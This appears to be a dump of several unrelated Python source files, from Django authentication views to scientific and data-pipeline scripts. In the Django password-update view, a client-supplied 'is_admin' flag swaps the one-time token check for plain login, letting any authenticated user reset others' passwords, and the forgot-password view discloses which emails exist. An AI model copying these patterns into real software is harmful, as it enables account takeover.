from resumecollection.utils.permissions import UpdatePasswordPermission
from resumecollection.utils.response_handler import validation_exception_handler

logger = logging.getLogger(__name__)
User = get_user_model()


class UserModelViewSet(ModelViewSet):
    """CRUD API for User objects, addressed by username instead of pk."""

    serializer_class = UserSerializer
    queryset = User.objects.all()
    lookup_field = "username"


class UserRedirectView(LoginRequiredMixin, RedirectView):
    """Redirects an authenticated user to their own detail page."""

    def get_redirect_url(self):
        return reverse("users:detail", kwargs={"username": self.request.user.username})


class ForgotPasswordAPIView(APIView):
    """Sends a password-update email to the address given in query params."""

    def validate_email(self, query_params):
        # Raises ValidationError when the email is missing/malformed.
        serializer = ForgotPasswordEmailSerializer(data=query_params)
        serializer.is_valid(raise_exception=True)
        return serializer.validated_data.get("email")

    def get(self, request) -> Response:
        """Validate the email, look up the user, and send the update link.

        Returns 200 on success; 400 when the email is invalid or no user
        with that address exists.
        """
        try:
            user_email_address = self.validate_email(request.query_params)
            user = get_object_or_404(User, email=user_email_address)
            send_password_update_email(
                user, UpdatePasswordHelper.generate_update_password_url(user)
            )
        except Http404:
            # get_object_or_404 found no user with this address.
            logger.error(
                f"Failure to find the object, the User with the email "
                f"{user_email_address} doesnt exist"
            )
            return Response(
                data=f"The User with the email {user_email_address} doesnt exist.",
                status=status.HTTP_400_BAD_REQUEST,
            )
        except ValidationError as validation_error:
            logger.error(
                f"Validation error occurred while sending forget password email. "
                f"Error: {validation_error}"
            )
            return Response(
                data="The email address is not valid",
                status=status.HTTP_400_BAD_REQUEST,
            )
        logger.info(
            f"Email for updating password has been sent to {user_email_address}"
        )
        return Response(
            data="Email has been sent successfully", status=status.HTTP_200_OK
        )


class UpdateUserPasswordAPIView(APIView):
    """Sets a new password for the user identified by the request's email."""

    permission_classes = [UpdatePasswordPermission]

    def get_permissions(self):
        # Admin-initiated updates require an authenticated session instead of
        # the one-time update-password permission.
        if self.request.data.get("is_admin"):
            return [permissions.IsAuthenticated()]
        return super(UpdateUserPasswordAPIView, self).get_permissions()

    def post(self, request) -> Response:
        """Validate the payload, store the new password, and invalidate the
        one-time update-password token. 400 on any validation/lookup failure."""
        try:
            serialized_data = UpdatePasswordRequestSerializer(data=request.data)
            serialized_data.is_valid(raise_exception=True)
            user = get_object_or_404(User, email=request.data.get("email"))
            # set_password hashes before saving.
            user.set_password(serialized_data.data["confirm_password"])
            user.save()
            UpdatePasswordHelper.invalidate_update_password_token(user.email)
            return Response(
                data="Password has been updated successfully", status=status.HTTP_200_OK
            )
        except Http404:
            logger.error(f"Failure to find the object, user with email doesnt exist")
            return Response(
                data="The User doesn't exist", status=status.HTTP_400_BAD_REQUEST
            )
        except ValidationError as validation_error:
            logger.error(
                f"Validation error occurred while updating the password with {validation_error}"
            )
            return Response(
                data=f"Failed to update the password with {validation_error}",
                status=status.HTTP_400_BAD_REQUEST,
            )


class LoginUserAPIView(APIView):
    """Username/password login endpoint returning an auth token."""

    permission_classes = [permissions.AllowAny]

    def post(self, request):
        """Authenticate the credentials and return a token plus the serialized
        user. 401 on bad credentials, 400 on a malformed payload."""
        try:
            request_serializer = LoginRequestSerializer(data=request.data)
            request_serializer.is_valid(raise_exception=True)
            username = request_serializer.validated_data["username"]
            password = request_serializer.validated_data["password"]
            remember_me = request_serializer.validated_data["remember_me"]
            # Usernames are stored lowercase, hence the .lower() here.
            user = authenticate(username=username.lower(), password=password)
            if not user:
                return Response(
                    data="Credentials not correct. Unable to Login.",
                    status=status.HTTP_401_UNAUTHORIZED,
                )
            token = create_login_token(user, remember_me)
            return Response(
                data={
                    "token": token,
                    "user": UserSerializer(user).data,
                    "message": "Successfully logged in.",
                },
                status=status.HTTP_200_OK,
            )
        except ValidationError as error:
            logger.info(
                f"Validation failed for User Login with exception {error}"
            )
            data = validation_exception_handler(error)
            data.update({"message": error.default_detail})
            return Response(data=data, status=status.HTTP_400_BAD_REQUEST)
5,923
1,513
#
# Copyright 2022 Picovoice Inc.
#
# You may not use this file except in compliance with the license. A copy of the license is located in the "LICENSE"
# file accompanying this source.
#
# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on
# an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#

import sys
import time
import unittest

from cobra import Cobra
from util import *
from test_util import *


class CobraPerformanceTestCase(unittest.TestCase):
    """Benchmarks Cobra audio processing and asserts it beats a threshold.

    NOTE(review): these class attributes read sys.argv at import time, so this
    module can only be imported with the CLI arguments present.
    """

    ACCESS_KEY = sys.argv[1]
    NUM_TEST_ITERATIONS = int(sys.argv[2])
    PERFORMANCE_THRESHOLD_SEC = float(sys.argv[3])

    def test_performance(self):
        """Process the sample file repeatedly; assert the mean per-iteration
        processing time stays under PERFORMANCE_THRESHOLD_SEC."""
        # Use the class-level constant for consistency (was raw sys.argv[1]).
        cobra = Cobra(access_key=self.ACCESS_KEY, library_path=pv_library_path('../..'))

        audio = read_wav_file(
            os.path.join(os.path.dirname(__file__), '../../res/audio/sample.wav'),
            cobra.sample_rate)

        num_frames = len(audio) // cobra.frame_length

        perf_results = []
        for i in range(self.NUM_TEST_ITERATIONS):
            proc_time = 0
            for j in range(num_frames):
                frame = audio[j * cobra.frame_length:(j + 1) * cobra.frame_length]
                start = time.time()
                cobra.process(frame)
                proc_time += time.time() - start

            # The first iteration is warm-up and intentionally discarded.
            if i > 0:
                perf_results.append(proc_time)

        cobra.delete()

        # Bug fix: average over the number of collected samples rather than
        # NUM_TEST_ITERATIONS — the warm-up iteration is not in perf_results,
        # so the old divisor under-reported the average. max(..., 1) keeps the
        # original 0.0 result when only one (warm-up) iteration is requested.
        avg_perf = sum(perf_results) / max(len(perf_results), 1)
        print("Average performance: %s" % avg_perf)
        self.assertLess(avg_perf, self.PERFORMANCE_THRESHOLD_SEC)


if __name__ == '__main__':
    if len(sys.argv) != 4:
        print("usage: test_cobra_perf.py ${ACCESS_KEY} ${NUM_TEST_INTERVALS} ${PERFORMANCE_THRESHOLD_SEC}")
        exit(1)
    unittest.main(argv=sys.argv[:1])
1,947
660
import bittensor
from config import Config
from metagraph import Metagraph
from dendrite import Dendrite
from nucleus import Nucleus
from neuron import Neuron
# NOTE(review): SHA256, grpc, pickle, numpy and random were only used by a
# large commented-out self-test (now removed); the imports are kept so any
# module importing names through this one keeps working.
from Crypto.Hash import SHA256
from datetime import timedelta
import grpc
from loguru import logger
import pickle
import numpy as np
import random
import time
from timeloop import Timeloop


def set_timed_loops(tl, config, neuron, metagraph):
    """Register the neuron's periodic background jobs on *tl*.

    :param tl: Timeloop scheduler the jobs are attached to
    :param config: node configuration (kept for API compatibility; unused here)
    :param neuron: Neuron whose connect/Learn methods are driven on a timer
    :param metagraph: Metagraph refreshed periodically from the network
    """
    # Pull the updated graph state (Vertices, Edges, Weights)
    @tl.job(interval=timedelta(seconds=7))
    def pull_metagraph():
        metagraph.pull_metagraph()

    # Reselect channels.
    @tl.job(interval=timedelta(seconds=10))
    def connect():
        neuron.connect()

    # Apply a gradient step.
    @tl.job(interval=timedelta(seconds=3))
    def learn():
        neuron.Learn()


def main():
    """Wire up the node components, start the timed jobs, and block until
    interrupted (Ctrl-C) or an unexpected error occurs."""
    config = Config()
    metagraph = Metagraph(config)
    dendrite = Dendrite(config, metagraph)
    nucleus = Nucleus(config)
    neuron = Neuron(config, dendrite, nucleus, metagraph)
    neuron.serve()

    # Start timed calls.
    tl = Timeloop()
    set_timed_loops(tl, config, neuron, metagraph)
    tl.start(block=False)
    logger.info('Started Timers.')

    def tear_down(_config, _neuron, _dendrite, _nucleus, _metagraph):
        # Drop all component references so they can be garbage collected.
        logger.debug('tear down.')
        del _neuron
        del _dendrite
        del _nucleus
        del _metagraph
        del _config

    try:
        logger.info('Begin wait on main...')
        while True:
            logger.debug('heartbeat')
            time.sleep(100)
    except KeyboardInterrupt:
        logger.debug('Neuron stopped with keyboard interrupt.')
        tear_down(config, neuron, dendrite, nucleus, metagraph)
    except Exception as e:
        logger.error('Neuron stopped with interrupt on error: ' + str(e))
        tear_down(config, neuron, dendrite, nucleus, metagraph)


if __name__ == '__main__':
    logger.debug("started neuron.")
    main()
4,034
1,327
# MIPLearn: Extensible Framework for Learning-Enhanced Mixed-Integer Optimization # Copyright (C) 2020, UChicago Argonne, LLC. All rights reserved. # Released under the modified BSD license. See COPYING.md for more details. from miplearn import LearningSolver from miplearn.problems.knapsack import KnapsackInstance def get_test_pyomo_instances(): instances = [ KnapsackInstance( weights=[23.0, 26.0, 20.0, 18.0], prices=[505.0, 352.0, 458.0, 220.0], capacity=67.0, ), KnapsackInstance( weights=[25.0, 30.0, 22.0, 18.0], prices=[500.0, 365.0, 420.0, 150.0], capacity=70.0, ), ] models = [instance.to_model() for instance in instances] solver = LearningSolver() for i in range(len(instances)): solver.solve(instances[i], models[i]) return instances, models
897
338
from binascii import unhexlify
import threading
import time


# Serialization utils
class PBSerializationHandler:
    """Encodes/decodes protobuf messages using the ASCII wire format
    '<id|hexpayload;id|hexpayload;...>' used over the serial link."""

    def __init__(self, msg_obj):
        # msg_obj: indexable collection mapping message id -> protobuf object
        self._msg_obj = msg_obj

    def encode_msgs(self, ids, msgs):
        """Serialize the (id, message) pairs into one framed ASCII string."""
        parts = ["<"]
        for msg_id, pb_msg in zip(ids, msgs):
            # Each payload byte becomes two lowercase hex digits.
            payload = "".join(format(byte, "02x") for byte in bytearray(pb_msg.SerializeToString()))
            parts.append("%s|%s;" % (msg_id, payload))
        parts.append(">")
        return "".join(parts)

    def encode_msg(self, id, msg):
        """Convenience wrapper around encode_msgs for a single message."""
        return self.encode_msgs([id], [msg])

    def deserialize(self, messages):
        """Parse a framed bytes buffer; returns a list of [id, parsed_obj].

        Each sub-message's payload is parsed into the protobuf object stored
        at index *id* of the collection given to the constructor.
        """
        decoded = messages.decode("ascii")
        object_list = []
        # Strip the '<' '>' framing and walk the ';'-separated chunks.
        for chunk in decoded[1:-1].split(';'):
            if not chunk:
                continue
            raw_id, raw_payload = chunk.split("|")
            msg_id = int(raw_id)
            obj = self._msg_obj[msg_id]
            obj.ParseFromString(unhexlify(raw_payload))
            object_list.append([msg_id, obj])
        return object_list


# Serial communication utils
class ArduinoReadHandler(threading.Thread):
    """Daemon-style worker that invokes *readfunc* every *sleeptime* seconds
    while resumed; pause/resume toggle an Event, kill stops the loop."""

    def __init__(self, sleeptime, readfunc):
        self._sleeptime = sleeptime
        self._readfunc = readfunc
        threading.Thread.__init__(self)
        self._runflag = threading.Event()
        self._runflag.clear()
        self._run = True

    def run(self):
        self._runflag.set()
        self.worker()

    def worker(self):
        # Poll until killed; only call readfunc while the run flag is set.
        while self._run:
            if self._runflag.is_set():
                self._readfunc()
            time.sleep(self._sleeptime)

    def pause(self):
        self._runflag.clear()

    def resume(self):
        self._runflag.set()

    def running(self):
        return self._runflag.is_set()

    def kill(self):
        self._run = False


class PBSerialHandler:
    """Full-duplex protobuf-over-serial handler: a background thread reads
    framed responses and feeds them to *callback*; writers are interlocked
    against the reader via a simple boolean flag."""

    def __init__(self, serial, callback, msg_obj, sleeptime=0.01):
        self._serial = serial
        self._sleeptime = float(sleeptime)
        self._callback = callback
        self._interlock = False
        self._response = None
        self._serialization_handler = PBSerializationHandler(msg_obj)
        self._worker = ArduinoReadHandler(self._sleeptime, self.read_callback)
        self._worker.start()

    def kill(self):
        """Stop the background read thread."""
        self._worker.kill()

    def read_callback(self):
        """Poll the serial port for one framed '<...>' response."""
        if self._interlock:
            return
        self._interlock = True
        try:
            lead = self._serial.read()
            if lead == b'<':
                body = self._serial.read_until(b'>')
                self._serial.flush()
                self._response = b'<' + body
                self._callback(self._response)
        except Exception as e:
            print("Read call back error " + str(e))
        self._interlock = False

    def write_pb_msg(self, id, msg):
        """Encode and send one (id, message) pair."""
        self.write_pb_msgs([id], [msg])

    def write_pb_msgs(self, ids, msgs):
        """Encode and send several messages, waiting for the reader to be idle."""
        encoded_msg = self._serialization_handler.encode_msgs(ids, msgs)
        # Busy-wait until the read side releases the interlock.
        while self._interlock:
            time.sleep(self._sleeptime)
        self._interlock = True
        self._serial.write(encoded_msg.encode("ascii"))
        self._serial.flush()
        self._interlock = False
3,394
1,033
# Demonstrates the two forms of `del`: deleting a list element and deleting
# a name binding.
li = [1, 2, 3, 3, 4, 5, 6]

# Remove the element at index 1 (the first 2); the list shrinks in place.
del li[1]
print(li)

# Delete the *name* li entirely; any later reference raises NameError.
del li
try:
    print(li)  # bug fix: the original crashed here with an unhandled NameError
except NameError as exc:
    print("li is no longer defined:", exc)
68
49
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Apr  4 18:07:03 2019

@author: NickT

Loads a pickled Materials Project database, keeps the compounds whose site
count matches their unit-cell formula, filters to "stable" phases by an
e_above_hull criterion supplied interactively, and (in parallel) computes
competing-phase / complementary-oxide statistics for each stable compound.
"""

from pymatgen import MPRester
import pandas as pd
import matplotlib.pyplot as plt
import csv
import multiprocessing as mp
import pickle
import tqdm
import time

mat_api_key = '<ENTER API KEY>'
mpr = MPRester(mat_api_key)

print("Loading Compounds....")
# Fix: use a context manager so the database file handle is closed.
with open('MPDatabase.pickle', 'rb') as file:
    all_compounds1 = pickle.load(file)

# Keep only compounds whose site count is consistent with the formula.
all_compounds = []
for compound in all_compounds1:
    if compound['nsites'] == sum(compound['unit_cell_formula'].values()):
        all_compounds.append(compound)

criteria = float(input("Enter Stable Phase Criteria in meV: "))

print('Finding Stable Phases....')
stable_phase = []
for compound in tqdm.tqdm(all_compounds):
    # find all compounds with e_above_hull within `criteria` meV of 0
    if abs(compound['e_above_hull']) < criteria/1000:
        stable_phase.append(compound)


######## COMPETING PHASE AND OXIDE CALCULATION ########
def find_comp(stable_oxides, compound_unit_cell, compound_formE, condition):
    '''
    Finds complementary oxide or competing phases group and associated total
    heat of oxidation.

    args:
        stable_oxides: list of dictionaries of stable oxides or competing
            phases with lower formation energy than original material
            (NOTE(review): the dicts are mutated in place — 'el_weight',
            'ranker' and 'ranking_no' keys are added)
        compound_unit_cell: dict of elements in unit cell of original compound
        compound_formE: formation energy of original compound
        condition: 'Oxide' for complementary oxides, anything else for
            competing phases

    output:
        tuple: (list of dictionaries of predicted materials, combined
        formation energy of these materials (with appropriate ratios),
        difference to the original material's formation energy, number of
        predicted materials, whether the greedy search ran out of candidates
        before accounting for every atom (boolean))

    notes:
        intersect_rank is used to find the limiting element by the ratio of
        normalised stoichiometry between the original material and the oxide.
    '''
    result = []
    FinishEarly = False
    # what if positive formE
    orig_natoms = sum(compound_unit_cell.values())
    # normalise stoichiometry of the original compound
    compound_unit_cell1 = dict((a, b/orig_natoms) for a, b in compound_unit_cell.items())
    for oxide in stable_oxides:
        # normalise stoichiometry of each candidate
        oxide['el_weight'] = dict((a, b/oxide['nsites']) for a, b in oxide['unit_cell_formula'].items())
        if condition == 'Oxide':
            # oxygen is supplied by the atmosphere, not the original compound
            del oxide['el_weight']['O']
        # greedy ranking parameter: candidate stoichiometry relative to target
        oxide['ranker'] = dict((a, b/compound_unit_cell1[a]) for a, b in oxide['el_weight'].items())
        oxide['ranking_no'] = sum(oxide['ranker'].values())
    # most favourable energy-per-ranking first
    sort_oxides = sorted(stable_oxides, key=lambda oxide: (oxide['formation_energy_per_atom']/oxide['ranking_no']))
    sort_oxides1 = sort_oxides[:]
    total_formE = 0
    # Greedily consume candidates until all atoms in the unit cell are
    # accounted for or no candidates remain.
    # NOTE(review): the float sum never reaches exactly 0, so in practice the
    # loop terminates via the candidate-list check below.
    while sum(compound_unit_cell1.values()) != 0 and sort_oxides1 != []:
        oxide = sort_oxides1[0]
        intersection = list(set(oxide['elements']).intersection(compound_unit_cell1.keys()))
        if intersection == []:
            # Diagnostic: candidate shares no element with the remainder.
            print(compound_unit_cell)
            print(oxide['unit_cell_formula'])
            print(oxide['nsites'])
        intersect_rank = {}
        for element in intersection:
            intersect_rank[element] = compound_unit_cell1[element] / oxide['el_weight'][element]
        limiting_element = min(intersect_rank, key=intersect_rank.get)  # find limiting element
        ratio = intersect_rank[limiting_element]  # (value)
        used_up_elements = []
        for element in intersection:
            compound_unit_cell1[element] = compound_unit_cell1[element] - (ratio * oxide['el_weight'][element])
            if abs(compound_unit_cell1[element]) < 0.0001:  # tolerance because of float != 0 problem
                used_up_elements.append(element)
        result.append(oxide)
        sort_oxides1.remove(oxide)
        total_formE += oxide['formation_energy_per_atom']*ratio
        # remove oxides in list which arent useful (dont have new elements)
        sort_oxides1 = [oxide for oxide in sort_oxides1 if len(set(oxide['elements']).intersection(used_up_elements)) == 0]
    if sort_oxides1 == [] and abs(sum(compound_unit_cell1.values())) > 0.0001:  # tolerance because of float != 0 problem
        print(compound_unit_cell1)
        FinishEarly = True
    return (result, total_formE, total_formE-compound_formE, len(result), FinishEarly)


#### FOR TESTING FIND_OXIDES
# Inline smoke test with synthetic A/B/C compounds; runs at import time and
# its result is intentionally discarded.
ABCO4 = {'elements': ['A', 'B', 'C', 'O'], 'formation_energy_per_atom': -750,
         'nsites': 7, 'unit_cell_formula': {'A': 1, 'B': 1, 'C': 1, 'O': 4}}
AO = {'elements': ['A', 'O'], 'formation_energy_per_atom': -100,
      'nsites': 8, 'unit_cell_formula': {'A': 4, 'O': 4}}
BO2 = {'elements': ['B', 'O'], 'formation_energy_per_atom': -100,
       'nsites': 6, 'unit_cell_formula': {'B': 2, 'O': 4}}
C2O = {'elements': ['C', 'O'], 'formation_energy_per_atom': -300,
       'nsites': 24, 'unit_cell_formula': {'C': 16, 'O': 8}}
A2BO6 = {'elements': ['A', 'B', 'O'], 'formation_energy_per_atom': -380,
         'nsites': 9, 'unit_cell_formula': {'A': 2, 'B': 1, 'O': 6}}
A2CO4 = {'elements': ['A', 'C', 'O'], 'formation_energy_per_atom': -620,
         'nsites': 63, 'unit_cell_formula': {'A': 18, 'C': 9, 'O': 36}}
original = {'A': 4, 'B': 8, 'C': 10}
listt = [ABCO4, AO, BO2, C2O, A2BO6, A2CO4]
find_comp(listt, original, -400, 'Oxide')
####


def Make_Property_Dict(compound):
    '''
    Function to be iterated over all compounds: builds the per-compound
    result row (competing-phase and oxide statistics). Returns an empty
    dict for compounds that do not meet the stability criterion.
    '''
    PDict = {}
    global stable_phase
    if abs(compound['e_above_hull']) < criteria/1000:  # if stable
        #### FOR NUM PHASES
        competing_phases_id_withform1 = []
        competing_phase_no1 = 0
        comp_listdict = []
        #### FOR NUM OXIDES
        v_ratio2 = 0
        oxide_no1 = 0
        oxides_id_withform1 = []
        v_ratio_id2 = 'n/a'
        oxide_listdict = []
        elements = compound['elements']
        for i in stable_phase:
            #### FOR NUM PHASES
            if set(i['elements']).issubset(elements):
                comp_listdict.append(i)  # for find_comp
                if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']:
                    # find all other phases containing just those elements
                    competing_phase_no1 += 1
                    competing_phases_id_withform1.append(i['task_id'])
            #### FOR NUM OXIDES
            if 'O' in i['elements']:
                el = i['elements'][:]
                el.remove('O')
                O = i['unit_cell_formula']['O']
                # candidate must contain a subset of our elements plus oxygen,
                # and must not be pure oxygen
                if set(el).issubset(elements) and O != i['nsites']:
                    oxide_listdict.append(i)  # for find_comp
                    if i['formation_energy_per_atom'] < compound['formation_energy_per_atom']:
                        oxide_no1 += 1
                        oxides_id_withform1.append(i['task_id'])
        #### FOR NUM PHASES
        PDict['task_id'] = compound['task_id']
        PDict['Formula'] = compound['pretty_formula']
        PDict['Bandgap /eV'] = compound['band_gap']
        PDict['Competing Phase Number (with formation E correction)'] = competing_phase_no1
        PDict['Competing Phase List (with formation E correction)'] = competing_phases_id_withform1
        y = find_comp(comp_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'NotOx')
        PDict['Complementary Competing Phase List'] = y[0]
        PDict['Complementary Heat of Decomposition'] = y[1]
        PDict['Lower Formation Energy Than Original Material'] = y[2]
        PDict['Number of Complementary Phases'] = y[3]
        PDict['Early Finish1'] = y[4]
        #### FOR NUM OXIDES
        PDict['Number of Oxides (with formation E correction)'] = oxide_no1
        PDict['Oxide List (with formation E correction)'] = oxides_id_withform1
        x = find_comp(oxide_listdict, compound['unit_cell_formula'], compound['formation_energy_per_atom'], 'Oxide')
        PDict['Complementary Oxide List'] = x[0]
        PDict['Complementary Heat of Oxidation'] = x[1]
        PDict['Lower Formation Energy Than Original Material'] = x[2]
        PDict['Number of Complementary Oxides'] = x[3]
        PDict['Early Finish2'] = x[4]
        # Find the complementary oxide whose volume is closest to the
        # original compound's volume.
        v_ratio2 = 1000
        for i in x[0]:
            v2 = i['volume']/compound['volume']
            if abs(v2 - 1) < abs(v_ratio2 - 1):
                v_ratio2 = v2
                v_ratio_id2 = i
        # NOTE(review): these two labels look swapped (the dict goes under
        # "Best Volume Ratio" and the ratio under "ID of ..."); kept as-is
        # because downstream consumers may rely on the existing columns.
        PDict['Best Volume Ratio'] = v_ratio_id2
        PDict['ID of Best Volume Ratio'] = v_ratio2
    return PDict


if __name__ == '__main__':
    pool = mp.Pool(processes=16)
    print('Calculating Data....')
    DictList = list(tqdm.tqdm(pool.imap(Make_Property_Dict, all_compounds), total=len(all_compounds)))
    FinalDF = pd.DataFrame(DictList)
    filename = 'FinalDF_' + str(criteria) + '.pckl'
    # Fix: context manager guarantees the output file is closed/flushed.
    with open(filename, 'wb') as f:
        pickle.dump(FinalDF, f)
    print('Done.')
9,769
3,246
import numpy as np

from layers.activation_layer import *
from layers.gradient_check import *


def mean_square_error_loss(y_hat, y):
    """
    MSE loss, loss = mean((y_hat - y)^2)

    :param y_hat: output of the network, shape (N, D)
    :param y: input labels, same shape as y_hat
    :return: (loss, d_loss) — scalar loss and dloss/dy_hat of shape (N, D)
    """
    loss = np.mean((y_hat - y) ** 2)
    # BUG FIX: the loss above averages over *all* N*D elements, so its gradient
    # is 2*(y_hat - y) / (N*D) = 2*(y_hat - y) / y.size.  The previous code
    # divided by the output width (y.shape[1]) only, producing a gradient N
    # times larger than the reported loss implies; softmax_loss below averages
    # over the batch consistently.
    d_loss = 2 * (y_hat - y) / y.size
    return loss, d_loss


def cross_entropy_loss(y_hat, y):
    """
    Cross entropy loss, loss = -sum(yi * log(y_hat))

    NOTE(review): this returns a per-sample loss vector (the batch-mean line
    was left commented out by the original author), and d_loss is likewise the
    per-sample gradient -y / y_hat.  Kept as-is to preserve behavior for
    existing callers — confirm whether the caller averages over the batch.

    :param y_hat: predicted class probabilities, shape (N, C)
    :param y: input labels (one_hot), shape (N, C)
    :return: (loss, d_loss) — per-sample cross entropy and its gradient
    """
    loss = -np.sum(y * np.log(y_hat), axis=1)
    # loss = np.mean(loss, axis=0)
    d_loss = -y / y_hat
    return loss, d_loss


def softmax_loss(x, y):
    """
    Numerically stable softmax + cross-entropy loss, averaged over the batch.

    :param x: raw scores (logits), shape (N, C)
    :param y: integer class labels, shape (N,)
    :return: (loss, dx) — scalar mean loss and gradient w.r.t. x, shape (N, C)
    """
    # shift by the per-row max so exp() cannot overflow; does not change probs
    shifted_logits = x - np.max(x, axis=1, keepdims=True)
    Z = np.sum(np.exp(shifted_logits), axis=1, keepdims=True)
    log_probs = shifted_logits - np.log(Z)
    probs = np.exp(log_probs)
    N = x.shape[0]
    loss = -np.sum(log_probs[np.arange(N), y]) / N
    # gradient: probs - one_hot(y), averaged over the batch
    dx = probs.copy()
    dx[np.arange(N), y] -= 1
    dx /= N
    return loss, dx


if __name__ == '__main__':
    np.random.seed(231)
    num_classes, num_inputs = 10, 50
    x = 0.001 * np.random.randn(num_inputs, num_classes)
    y = np.random.randint(num_classes, size=num_inputs)

    dx_num = eval_numerical_gradient(lambda x: softmax_loss(x, y)[0], x, verbose=False)
    loss, dx = softmax_loss(x, y)

    # Test softmax_loss function. Loss should be 2.3 and dx error should be 1e-8
    print('\nTesting softmax_loss:')
    print('loss: ', loss)
    print('dx error: ', rel_error(dx_num, dx))
1,638
668
from datapackage_pipelines.wrapper import ingest, spew
from datapackage_pipelines.utilities.resources import PROP_STREAMING
from bs4 import BeautifulSoup

parameters, datapackage, resources = ingest()


def get_resource():
    """Yield search-ready docs for rows of the configured clearmash collection."""
    target_collection = parameters["collection-name"]
    for resource in resources:
        for row in resource:
            # skip rows from other collections and rows not cleared for display
            if row["collection"] != target_collection or not row["display_allowed"]:
                continue
            doc = row["parsed_doc"]
            titles = doc.get("entity_name", {})
            descriptions = doc.get("_c6_beit_hatfutsot_bh_base_template_description", {})
            item = {"doc_id": "clearmash_{}".format(row["id"]),
                    "source": "clearmash",
                    "collection": target_collection,
                    "title_he": titles.get("he", ""),
                    "title_en": titles.get("en", ""),
                    "content_html_he": descriptions.get("he", ""),
                    "content_html_en": descriptions.get("en", "")}
            # plain-text versions of the html content, for full-text indexing
            for lang in ("he", "en"):
                html = item["content_html_" + lang]
                item["content_text_" + lang] = ' '.join(
                    BeautifulSoup(html, "lxml").findAll(text=True))
            yield item


datapackage["resources"] = [
    {PROP_STREAMING: True,
     "name": parameters["resource-name"],
     "path": "{}.csv".format(parameters["resource-name"]),
     "schema": {"fields": [{'name': 'doc_id', 'type': 'string', 'es:index': False},
                           {"name": "source", "type": "string", "es:index": False},
                           {"name": "collection", "type": "string", "es:index": False},
                           {"name": "title_he", "type": "string"},
                           {"name": "title_en", "type": "string"},
                           {"name": "content_html_he", "type": "string", "es:index": False},
                           {"name": "content_html_en", "type": "string", "es:index": False},
                           {"name": "content_text_he", "type": "string"},
                           {"name": "content_text_en", "type": "string"}],
                "primaryKey": ["doc_id"]}}]

spew(datapackage, [get_resource()])
2,518
672
# Databricks notebook source
# MAGIC %md
# MAGIC References
# MAGIC
# MAGIC https://spark.apache.org/docs/latest/api/python/pyspark.sql.html#pyspark.sql.DataFrameStatFunctions<br>
# MAGIC https://docs.azuredatabricks.net/user-guide/visualizations/index.html<br>

# COMMAND ----------

# MAGIC %md
# MAGIC #### Get a dataframe for notebook tasks

# COMMAND ----------

# MAGIC %run ./adb_3_ingest_to_df

# COMMAND ----------

# MAGIC %md
# MAGIC ### Data exploration

# COMMAND ----------

df_flights_full.printSchema()

# COMMAND ----------

df_flights_full.count()

# COMMAND ----------

# See if there are duplicate rows - if so, this will differ from just count()
df_flights_full.distinct().count()

# COMMAND ----------

# How many duplicates?
df_flights_full.count() - df_flights_full.dropDuplicates().count()

# COMMAND ----------

# How many duplicates and missing values?
df_flights_full.count() - df_flights_full.dropDuplicates().dropna(how="any", subset=["DepDelay", "ArrDelay"]).count()

# COMMAND ----------

# Summary statistics
display(df_flights_full.describe())

# COMMAND ----------

# Descriptive stats may not make sense for all columns in the df, so let's just get desc stats for a subset
display(df_flights_full.describe().select("summary", "DepDelay", "ArrDelay"))

# COMMAND ----------

# Get top rows - head(n) or take(n)
display(df_flights_full.head(5))

# COMMAND ----------

# BUG FIX: DataFrame.show() takes a lowercase `truncate` keyword;
# `Truncate=False` raises TypeError (unexpected keyword argument) in PySpark.
df_flights_full.show(truncate=False)

# COMMAND ----------

# limit(n), head(n), take(n)
display(df_flights_full.head(7))

# COMMAND ----------

# Show the physical/logical query plan for this dataframe
df_flights_full.explain()

# COMMAND ----------

# MAGIC %md
# MAGIC #### Stats

# COMMAND ----------

# Approximate quartiles of arrival delay (relative error 0.1)
df_flights_full.approxQuantile("ArrDelay", [0.25, 0.5, 0.75], 0.1)

# COMMAND ----------

# Frequent items in the destination-airport column
display(df_flights_full.freqItems(["DestAirportID"]))

# COMMAND ----------

# Check correlation between two fields
df_flights_full.corr("DepDelay", "ArrDelay")

# COMMAND ----------

display(df_flights_full.select("DepDelay", "ArrDelay"))

# COMMAND ----------
2,011
772
from .convert import convert, simplify_and_convert
50
12
""" Takes an input MT, and extracts a VCF-format representation. This is currently required as the end-to-end CPG pipeline doesn't currently store intermediate files. To simulate workflows running on VCF files, we have to regenerate a VCF representation from a MT. Optional argument allows the specification of an 'additional header' file When Hail extracts a VCF from a MT, it doesn't contain any custom field definitions, e.g. 'VQSR' as a Filter field. This argument allows us to specify additional lines which are required to make the final output valid within the VCF specification """ from typing import Optional from argparse import ArgumentParser import hail as hl from cpg_utils.hail_batch import init_batch def main(input_mt: str, output_path: str, additional_header: Optional[str] = None): """ takes an input MT, and reads it out as a VCF :param input_mt: :param output_path: :param additional_header: file containing lines to append to header :return: """ init_batch() matrix = hl.read_matrix_table(input_mt) hl.export_vcf( matrix, output_path, append_to_header=additional_header, tabix=True, ) if __name__ == '__main__': parser = ArgumentParser() parser.add_argument( '--input', type=str, help='input MatrixTable path', ) parser.add_argument('--output', type=str, help='path to write VCF out to') parser.add_argument( '--additional_header', type=str, help='path to file containing any additional header lines', required=False, default=None, ) args = parser.parse_args() main( input_mt=args.input, output_path=args.output, additional_header=args.additional_header, )
1,788
525
#!/usr/bin/env python
"""
Python function for computing word error rates metric for Automatic Speech Recognition files
"""

import argparse
import re

import editdistance

from asrtoolkit.clean_formatting import clean_up
from asrtoolkit.data_structures.time_aligned_text import time_aligned_text
from asrtoolkit.file_utils.script_input_validation import assign_if_valid

# defines global regex for tagged noises and silence
re_tagged_nonspeech = re.compile(r"[\[<][A-Za-z #]*[\]>]")

# defines global regex to remove these nsns
nonsilence_noises = [
    "noise",
    "um",
    "ah",
    "er",
    "umm",
    "uh",
    "mm",
    "mn",
    "mhm",
    "mnh",
    "huh",
    "hmm",
]
re_nonsilence_noises = re.compile(r"\b({})\b".format(
    "|".join(nonsilence_noises)))


def remove_nonsilence_noises(input_text):
    """
    Removes nonsilence noises from a transcript
    """
    return re.sub(re_nonsilence_noises, "", input_text)


def _as_text(transcript):
    """Return plain text whether given a string or a time_aligned_text object."""
    # isinstance (rather than type(...) ==) also accepts subclasses
    return transcript.text() if isinstance(transcript, time_aligned_text) else transcript


